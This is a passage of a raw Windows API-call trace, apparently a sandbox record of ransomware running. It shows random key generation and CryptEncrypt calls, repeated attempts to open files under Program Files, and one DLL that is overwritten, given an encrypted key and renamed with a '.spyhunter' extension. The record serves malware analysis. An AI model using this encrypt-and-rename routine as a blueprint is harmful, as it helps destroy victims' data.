hHeap=0x2c0000) returned 1 [0113.183] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa48 | out: pbBuffer=0x248fa48) returned 1 [0113.183] GetProcessHeap () returned 0x2c0000 [0113.183] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.183] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa40*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa40*=0x30) returned 1 [0113.183] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.DirectoryServices.AccountManagement.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.directoryservices.accountmanagement.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.184] GetProcessHeap () returned 0x2c0000 [0113.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.184] GetProcessHeap () returned 0x2c0000 [0113.184] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e25b30 | out: hHeap=0x2c0000) returned 1 [0113.184] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa40 | out: pbBuffer=0x248fa40) returned 1 [0113.184] GetProcessHeap () returned 0x2c0000 [0113.184] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.184] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa38*=0x30) returned 1 [0113.184] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.185] GetProcessHeap () returned 0x2c0000 [0113.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.185] GetProcessHeap () returned 0x2c0000 [0113.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d160 | out: hHeap=0x2c0000) returned 1 [0113.185] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa40 | out: pbBuffer=0x248fa40) returned 1 [0113.185] GetProcessHeap () returned 0x2c0000 [0113.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.185] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa38*=0x30) returned 1 [0113.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.185] GetProcessHeap () returned 0x2c0000 [0113.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.185] GetProcessHeap () returned 0x2c0000 [0113.185] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dea078 | out: hHeap=0x2c0000) returned 1 [0113.185] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa38 | out: pbBuffer=0x248fa38) returned 1 [0113.185] GetProcessHeap () returned 0x2c0000 [0113.185] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.185] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa30*=0x30) returned 1 [0113.185] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Services.Client.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.services.client.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.186] GetProcessHeap () returned 0x2c0000 [0113.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.186] GetProcessHeap () returned 0x2c0000 [0113.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de96a0 | out: hHeap=0x2c0000) returned 1 [0113.186] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa38 | out: pbBuffer=0x248fa38) returned 1 [0113.186] GetProcessHeap () returned 0x2c0000 [0113.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.186] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa30*=0x30) returned 1 [0113.186] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Linq.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.linq.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.186] GetProcessHeap () returned 0x2c0000 [0113.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.186] GetProcessHeap () returned 0x2c0000 [0113.186] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc4870 | out: hHeap=0x2c0000) returned 1 [0113.186] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa30 | out: pbBuffer=0x248fa30) returned 1 [0113.186] GetProcessHeap () returned 0x2c0000 [0113.186] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.186] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa28*=0x30) returned 1 [0113.186] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.187] GetProcessHeap () returned 0x2c0000 [0113.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.187] GetProcessHeap () returned 0x2c0000 [0113.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35d060 | out: hHeap=0x2c0000) returned 1 [0113.187] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa30 | out: pbBuffer=0x248fa30) returned 1 [0113.187] GetProcessHeap () returned 0x2c0000 [0113.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.187] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa28*=0x30) returned 1 [0113.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.Entity.Design.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.entity.design.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.188] GetProcessHeap () returned 0x2c0000 [0113.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.188] GetProcessHeap () returned 0x2c0000 [0113.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9f60 | out: hHeap=0x2c0000) returned 1 [0113.188] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa28 | out: pbBuffer=0x248fa28) returned 1 [0113.188] GetProcessHeap () returned 0x2c0000 [0113.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.188] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa20*=0x30) returned 1 [0113.188] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Data.DataSetExtensions.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.data.datasetextensions.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.188] GetProcessHeap () returned 0x2c0000 [0113.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.188] GetProcessHeap () returned 0x2c0000 [0113.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2de9e48 | out: hHeap=0x2c0000) returned 1 [0113.188] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa28 | out: pbBuffer=0x248fa28) returned 1 [0113.188] GetProcessHeap () returned 0x2c0000 [0113.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.189] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa20*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa20*=0x30) returned 1 [0113.189] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.Core.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.core.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.189] GetProcessHeap () returned 0x2c0000 [0113.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.189] GetProcessHeap () returned 0x2c0000 [0113.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc6390 | out: hHeap=0x2c0000) returned 1 [0113.189] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa20 | out: pbBuffer=0x248fa20) returned 1 [0113.189] GetProcessHeap () returned 0x2c0000 [0113.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.189] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa18*=0x30) returned 1 [0113.189] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.5\\System.ComponentModel.DataAnnotations.dll" (normalized: "c:\\program files\\reference assemblies\\microsoft\\framework\\v3.5\\system.componentmodel.dataannotations.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.227] GetProcessHeap () returned 0x2c0000 [0113.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.227] GetProcessHeap () returned 0x2c0000 [0113.227] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cecd00 | out: hHeap=0x2c0000) returned 1 [0113.227] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa20 | out: pbBuffer=0x248fa20) returned 1 [0113.227] GetProcessHeap () returned 0x2c0000 [0113.227] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.227] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa18*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa18*=0x30) returned 1 [0113.227] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceqp35.dll" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceqp35.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0113.231] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceqp35.dll") returned 76 [0113.231] StrStrW (lpFirst="sqlceqp35.dll", lpSrch=".txt") returned 0x0 [0113.231] GetProcessHeap () returned 0x2c0000 [0113.231] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0113.231] ReadFile (in: hFile=0xb4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f9dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248f9dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.283] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0113.283] WriteFile (in: hFile=0xb4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f9dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248f9dc*=0x2800, lpOverlapped=0x0) returned 1 [0113.286] GetProcessHeap () returned 0x2c0000 [0113.286] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0113.286] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0113.286] WriteFile (in: hFile=0xb4, lpBuffer=0x248fa1c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f9dc, lpOverlapped=0x0 | out: lpBuffer=0x248fa1c*, lpNumberOfBytesWritten=0x248f9dc*=0x4, lpOverlapped=0x0) returned 1 [0113.295] WriteFile (in: hFile=0xb4, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f9dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248f9dc*=0x30, lpOverlapped=0x0) returned 1 [0113.296] CloseHandle (hObject=0xb4) returned 1 [0113.296] GetProcessHeap () returned 0x2c0000 [0113.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0113.296] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceqp35.dll.spyhunter") returned 86 [0113.296] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceqp35.dll" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceqp35.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\sqlceqp35.dll.spyhunter" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\sqlceqp35.dll.spyhunter")) returned 1 [0113.296] GetProcessHeap () returned 0x2c0000 [0113.296] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0113.296] GetProcessHeap () returned 0x2c0000 [0113.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.297] GetProcessHeap () returned 0x2c0000 [0113.297] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd5208 | out: hHeap=0x2c0000) returned 1 [0113.297] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa18 | out: pbBuffer=0x248fa18) returned 1 [0113.297] GetProcessHeap () returned 0x2c0000 [0113.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.297] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa10*=0x30) returned 1 [0113.297] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.317] GetProcessHeap () returned 0x2c0000 [0113.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.317] GetProcessHeap () returned 0x2c0000 [0113.317] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc30f8 | out: hHeap=0x2c0000) returned 1 [0113.318] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa18 | out: pbBuffer=0x248fa18) returned 1 [0113.318] GetProcessHeap () returned 0x2c0000 [0113.318] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.318] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa10*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa10*=0x30) returned 1 [0113.318] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\rings-dock.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\calendar.gadget\\images\\rings-dock.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.359] GetProcessHeap () returned 0x2c0000 [0113.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.359] GetProcessHeap () returned 0x2c0000 [0113.359] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc6b10 | out: hHeap=0x2c0000) returned 1 [0113.359] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa10 | out: pbBuffer=0x248fa10) returned 1 [0113.359] GetProcessHeap () returned 0x2c0000 [0113.359] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0113.360] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fa08*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fa08*=0x30) returned 1 [0113.360] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\logo.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.360] GetProcessHeap () returned 0x2c0000 [0113.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0113.360] GetProcessHeap () returned 0x2c0000 [0113.360] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d02c90 | out: hHeap=0x2c0000) returned 1 [0113.903] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa08 | out: pbBuffer=0x248fa08) returned 1 [0113.903] GetProcessHeap () returned 0x2c0000 [0113.903] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.903] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248fa00*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248fa00*=0x30) returned 1 [0113.904] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\icon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.905] GetProcessHeap () returned 0x2c0000 [0113.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.905] GetProcessHeap () returned 0x2c0000 [0113.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cccb60 | out: hHeap=0x2c0000) returned 1 [0113.905] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa08 | out: pbBuffer=0x248fa08) returned 1 [0113.905] GetProcessHeap () returned 0x2c0000 [0113.905] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.905] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248fa00*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248fa00*=0x30) returned 1 [0113.905] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\settings.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\settings.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.916] GetProcessHeap () returned 0x2c0000 [0113.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.916] GetProcessHeap () returned 0x2c0000 [0113.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e1a2e8 | out: hHeap=0x2c0000) returned 1 [0113.916] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fa00 | out: pbBuffer=0x248fa00) returned 1 [0113.916] GetProcessHeap () returned 0x2c0000 [0113.916] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.916] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9f8*=0x30) returned 1 [0113.916] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\en-US\\js\\settings.js" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\en-us\\js\\settings.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.923] GetProcessHeap () returned 0x2c0000 [0113.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.924] GetProcessHeap () returned 0x2c0000 [0113.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ca5b40 | out: hHeap=0x2c0000) returned 1 [0113.944] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9f8 | out: pbBuffer=0x248f9f8) returned 1 [0113.944] GetProcessHeap () returned 0x2c0000 [0113.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.945] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9f0*=0x30) returned 1 [0113.945] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\RSSFeeds.html" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\en-us\\rssfeeds.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.977] GetProcessHeap () returned 0x2c0000 [0113.977] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.977] GetProcessHeap () returned 0x2c0000 [0113.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e191e8 | out: hHeap=0x2c0000) returned 1 [0113.978] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9f8 | out: pbBuffer=0x248f9f8) returned 1 [0113.978] GetProcessHeap () returned 0x2c0000 [0113.978] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0113.978] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x248f9f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x248f9f0*=0x30) returned 1 [0113.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\10.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\weather.gadget\\images\\10.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0113.998] GetProcessHeap () returned 0x2c0000 [0113.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0113.998] GetProcessHeap () returned 0x2c0000 [0113.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cccb60 | out: hHeap=0x2c0000) returned 1 [0113.998] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f9f0 | out: pbBuffer=0x248f9f0) returned 1 [0113.998] GetProcessHeap () returned 0x2c0000 [0113.998] RtlAllocateHeap 